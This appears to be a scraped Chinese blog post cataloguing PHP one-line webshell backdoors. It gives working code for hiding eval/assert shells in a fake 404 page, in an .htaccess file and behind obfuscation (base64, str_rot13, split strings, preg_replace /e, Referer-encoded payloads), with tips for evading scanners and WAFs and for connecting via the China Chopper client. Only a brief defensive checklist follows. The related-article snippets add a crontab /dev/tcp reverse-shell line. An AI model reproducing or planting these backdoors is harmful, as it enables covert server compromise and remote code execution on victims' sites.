1. 程式人生 > >PHP一句話後門

PHP一句話後門

1、利用404頁面隱藏一句話

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
</body></html>
<?php
@preg_replace("/[pageerror]/e",$_POST['error'],"saft");
header('HTTP/1.1 404 Not Found');
?>

2、無特徵隱藏一句話
<?php
session_start();
$_POST['code'] && $_SESSION['theCode'] = trim($_POST['code']);
$_SESSION['theCode']&&preg_replace('\'a\'eis','e'.'v'.'a'.'l'.'(base64_decode($_SESSION[\'theCode\']))','a');

/*
將$_POST['code']的內容賦值給$_SESSION['theCode'],然後執行$_SESSION['theCode'],亮點是沒有特徵碼。用掃描工具來檢查程式碼的話,是不會報警的,達到目的了。
*/

3、高階隱藏一句話
$_GET[a]($_GET[b]);

利用方法:
?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%    29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};
/*
執行後當前目錄生成c.php一句話木馬,當傳參a為eval時會報錯木馬生成失敗,為assert時同樣報錯,但會生成木馬,真可謂不可小視,簡簡單單的一句話,被延伸到這般應用。
*/
4、層級請求,編碼執行一句話
/*此方法用兩個檔案實現
檔案1
*/
<?php
//1.php
header('Content-type:text/html;charset=utf-8');
parse_str($_SERVER['HTTP_REFERER'], $a);
if(reset($a) == '10' && count($a) == 9) {
   eval(base64_decode(str_replace(" ", "+", implode(array_slice($a, 6)))));
}
檔案2

<?php
//2.php
header('Content-type:text/html;charset=utf-8');
//要執行的程式碼
$code = <<<CODE
phpinfo();
CODE;
//進行base64編碼
$code = base64_encode($code);
//構造referer字串
$referer = "a=10&b=ab&c=34&d=re&e=32&f=km&g={$code}&h=&i=";
//後門url
$url = 'http://localhost/test1/1.php';
$ch = curl_init();
$options = array(
    CURLOPT_URL => $url,
    CURLOPT_HEADER => FALSE,
    CURLOPT_RETURNTRANSFER => TRUE,
    CURLOPT_REFERER => $referer
);
curl_setopt_array($ch, $options);
echo curl_exec($ch);
/*
通過HTTP請求中的HTTP_REFERER來執行經過base64編碼的程式碼,來達到後門的效果,一般waf對referer這些檢測要鬆一點,或者沒有檢測。用這個思路bypass waf不錯。
*/

5、三個變形的一句話木馬
第一個

<?php ([email protected]$_GET[2])[email protected]$_($_POST[1])?>
在菜刀裡寫http://site/1.php?2=assert密碼是1

第二個

<?php
$_="";
$_[+""]='';
$_="$_"."";
$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");
?>
<?php ${'_'.$_}['_'](${'_'.$_}['__']);?>
在菜刀裡寫http://site/2.php?_=assert&__=eval($_POST['pass']) 密碼是pass。

如果你用菜刀的附加資料的話更隱蔽,或者用其它注射工具也可以,因為是post提交的。

第三個

($b4dboy = $_POST['b4dboy']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($b4dboy)', 'add');
str_rot13(‘riny’)即編碼後的eval,完全避開了關鍵字,又不失效果,讓人吐血!

6、.htaccess做木馬後門
AddType application/x-httpd-php .htaccess
###### SHELL ###### 這裡寫上你的後門吧###### LLEHS ######

7、特殊php一句話
1、
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
$hh("/[discuz]/e",$_POST['h'],"Access");
//菜刀一句話
2、
$filename=$_GET['xbid'];
include ($filename);
//危險的include函式,直接編譯任何檔案為php格式執行
3、
$reg="c"."o"."p"."y";
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
//重新命名任何檔案
4、
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
$gzid("/[discuz]/e",$_POST['h'],"Access");
//菜刀一句話
5、include ($uid);
//危險的include函式,直接編譯任何檔案為php格式執行,POST www.xxx.com/index.php?uid=/home/www/bbs/image.gif
//gif插一句話
6、典型一句話
程式後門程式碼
<?php eval_r($_POST[sb])?>
程式程式碼
<?php @eval_r($_POST[sb])?>
//容錯程式碼
程式程式碼
<?php assert($_POST[sb]);?>
//使用lanker一句話客戶端的專家模式執行相關的php語句
程式程式碼
<?$_POST['sa']($_POST['sb']);?>
程式程式碼
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
程式程式碼
<?php
@preg_replace("/[email]/e",$_POST['h'],"error");
?>
//使用這個後,使用菜刀一句話客戶端在配置連線的時候在"配置"一欄輸入
程式程式碼
<O>[email protected]_r($_POST1);</O>
程式程式碼
<script language="php">@eval_r($_POST[sb])</script>
//繞過<?限制的一句話

最後,如何應對php後門
1、對PHP程式編寫要有安全意識
2、伺服器日誌檔案要經常看,經常備份
3、對每個站點進行嚴格的許可權分配
4、對動態檔案及目錄經常批量安全審查
5、學會如何進行手工防毒《即行為判斷查殺》
6、時刻關注,或滲入活躍的網路安全營地
7、對伺服器環境層級化處理,哪怕一個函式也可做規則

相關推薦

那些強悍的PHP一句話後門

強悍的PHP一句話後門 常用一: <?php $a=range(1,200);$b=chr($a[96-1+1]).chr($a[114-1+1]).chr($a[114-1+1]).chr($a[100-1+1]).chr($a[113-1+1]).ch

PHP一句話後門

1、利用404頁面隱藏一句話 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title>

PHP一句話後門過狗姿勢萬千之後門構造與隱藏

第二章節主要帶給大家一些後門構造思路,與安全狗檔案特徵檢測的機制。 另外強調一下,這篇文章需要大家對於php有一定的認識。 本章節分為三大部分,第一部分針對初級,分析菜刀php程式碼的執行過程,較基礎;第二部分主要總結一些可以利用的後門姿勢,這部分我主要給大家分享一些蒐集

php 一句話木馬、後門

強悍的PHP一句話後門 這類後門讓網站、伺服器管理員很是頭疼,經常要換著方法進行各種檢測,而很多新出現的編寫技術,用普通的檢測方法是沒法發現並處理的。今天我們細數一些有意思的PHP一句話木馬。 利用404頁面隱藏PHP小馬: <strong><!DOC

PHP網站掃描一句話後門WebShell指令碼原始碼

$matches = array( '/mb_ereg_replace\([\'\*\s\,\.\"]+\$_(?:GET|POST|REQUEST|COOKIE|SERVER)\[[\'\"].*?[\'\"][\]][\,\s\'\"]+e[\'\"]'/is, '/pre

表弟讓整理的各種一句話後門= =

信息安全 php asp php 利用404頁面隱藏PHP小馬<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</titl

eval與php一句話的關系

IV 技術 TP AR inf HP request 引用 完全 part1 首先我們知道,eval能執行php代碼,最常見的php一句話也是用eval關鍵字的。 <?php @eval($_GET["code"])?> Part2 在T00ls論壇混的

PHP WeBaCoo後門學習筆記

  WeBaCoo (Web Backdoor Cookie) 是一款隱蔽的指令碼類Web後門工具。設計理念是躲避AV、NIDS、IPS、網路防火牆和應用防火牆的查殺,提供混淆和原始兩種後門程式碼(原始程式碼較難檢測)。WebBaCoo 使用HTTP響應頭傳送命令執行的

PHP一句話木馬Webshell變形免殺總結

0×00 前言   大部分Webshell查殺工具都是基於關鍵字特徵的,通常他們會維護一個關鍵字列表,以此遍歷指定副檔名的檔案來進行掃描,所以可能最先想到的是各種字串變形,下面總結了一些小的方法,各種不足之前還請看官拍磚.   0×01 字串上的舞蹈     一

crontab一句話後門分析

正常版本 (crontab -l;echo '*/60 * * * * exec 9<> /dev/tcp/127.0.0.1/8888;exec 0<&9;exec 1>&9 2>&1;/bin/bash --noprofile -i')|cro

PHP 一句話木馬

特殊 技術 函數返回 code 分享 span ima rap .com eval 函數 eval() 函數把字符串按照 PHP 代碼來計算 該字符串必須是合法的 PHP 代碼,且必須以分號結尾 如果沒有在代碼字符串中調用 return 語句,則返回 NU

繞過網站安全狗攔截,上傳Webshell技巧總結(附免殺PHP一句話

這篇文章我介紹一下我所知道的繞過網站安全狗上傳WebShell的方法。 思路是:修改HTTP請求,構成畸形HTTP請求,然後繞過網站安全狗的檢測。 廢話不多說,切入正題。。。。 1、實驗環境: Windows Server 2003、 Apache/2.4.18、PHP/5.3.29、網站安全狗(Apac

PHP一句話木馬研究

quest params slide tin gin 相同 handler 函數參數 方法 最近在研究PHP一句話後門,查閱了很多大佬的博客,並從中衍生出了一些可用的方法。 現總結如下: 方案一:回調函數 回調函數:Callback (即call then back 被主

php -- cookie 後門

ttp://blog.sucuri.net/2014/04/joomla-plugin-constructor-backdoor.html https://gist.github.com/PhilETaylor/8045002 http://www.freebuf.com

PHP混淆後門解剖分析(反抓流量、加密結果)

開始前的例行叨叨:這個後門樣本收集於2018紅帽杯線下決賽,看到有其他分析收集於自己的伺服器,悲劇了(手動笑哭),貌似藍帽杯也有。除錯了很久,被逼著專門學了半天正則表示式,但感覺寫完這篇文章就忘乾淨了。馬的特殊性就是,靠特別麻煩,讓你在現場心態崩潰,除錯不出來,而且抓到流量不

一句話後門中eval和assert的區別

eval函式中引數是字元,如: eval('echo 1;'); assert函式中引數為表示式 (或者為函式),如: assert(phpinfo()) assert(eval('echo 1;')); 直接傳遞普通程式碼是無法執行的,如:assert('

PHP 回調後門筆記

回調後門在php中 存在回調函數參數的函數,都有可能作為後門比如array_map , array_filter 這類數組操作的回調函數,但是在安全狗下會被殺掉但是uasort 這類函數不會被殺掉。php5.4.8之後的assert在5.4.8之後,assert函數由一個參數,變成了兩個參數。增加了一個可選參

手把手教你編寫一個簡單的PHP模塊形態的後門

cpp rest xtu job ring 事先 們的 original call 看到Freebuf 小編發表的用這個隱藏於PHP模塊中的rootkit,就能持久接管服務器文章,很感興趣,苦無作者沒留下PoC,自己研究一番,有了此文 0×00. 引言 PHP是一個非常流行

整理的最新WebSHell (php過狗一句話,過狗菜刀,2016過狗一句話,2016php免殺一句話)

一句話木馬中國菜刀下載,基於原版中國菜刀優化版20160309.下載地址:http://download.csdn.net/detail/settoken/9457567https://pan.baidu.com/s/1jHoJxHWChina chopperhttps://pan.baidu.com/s/1

給你的PHP大馬添加後門(黑吃黑)

測試 hacks bubuko 環境 div muc i94 測試環境 dmi Part 1 引子   說什麽好呢,發個圖就當個引子好了。 Part 2 XSS平臺   創建項目   選擇類型   xss代碼   小實驗,刷新代碼